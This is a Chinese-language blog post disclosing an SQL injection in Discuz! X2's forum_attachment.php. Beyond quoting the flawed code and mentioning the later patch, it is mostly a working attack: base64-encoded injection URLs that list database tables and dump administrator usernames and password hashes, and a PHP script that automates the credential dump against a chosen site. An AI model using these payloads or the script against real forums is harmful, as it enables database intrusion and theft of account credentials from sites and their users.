http://hi.baidu.com/bigideaer/blog/item/c2868c26c8ca1e4e4ec22615.html
核心提示:文件:source\module\forum\forum_attachment.php
漏洞名称:Discuz! X2 SQL注射漏洞
if(!defined(‘IN_DISCUZ’)) {exit(‘Access Denied’);}define(‘NOROBOT’, TRUE);@list($_G[...
文件:source\module\forum\forum_attachment.php
漏洞名称:Discuz! X2 SQL注射漏洞
if(!defined(‘IN_DISCUZ’)) {
exit(‘Access Denied’);
}
define(‘NOROBOT’, TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode(‘|’, base64_decode($_G['gp_aid']));
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first(“SELECT pid, tid FROM “.DB::table(‘forum_attachment’).” WHERE aid=’$_G[gp_aid]‘”))) {
dheader(‘location: forum.php?mod=redirect&goto=findpost&pid=’.$attach['pid'].’&ptid=’.$attach['tid']);
}
变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。
http://www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZ
WN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJM
RVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9
OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
转向后网址
http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member
暴出表名 pre_common_admincp_member
实际查询为:
$x=”1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|x|x|x”;
//die (urlencode(base64_encode($x)));
利用方法:
DZ X2直接暴管理账号密码
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D
假如利用不成功说明不是默认前缀
可以用
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
暴前缀 不过一般都没人改.
补充:
官方已经发布补丁 已经把forum_attachment.php文件修复了
$_G['gp_aid']增加了一次daddslashes自定义函数的过滤然后$aid = intval($_G['gp_aid']);一下.
<?php
echo "By:Steeltiger \n";
echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo "Start\n";
$exp = base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like '".$argv[2]."|x|y");
$url = "forum.php?mod=attachment&findpost=ss&aid=";
file_get_contents($argv[1].$url.$exp);
echo "End\n";
}
?>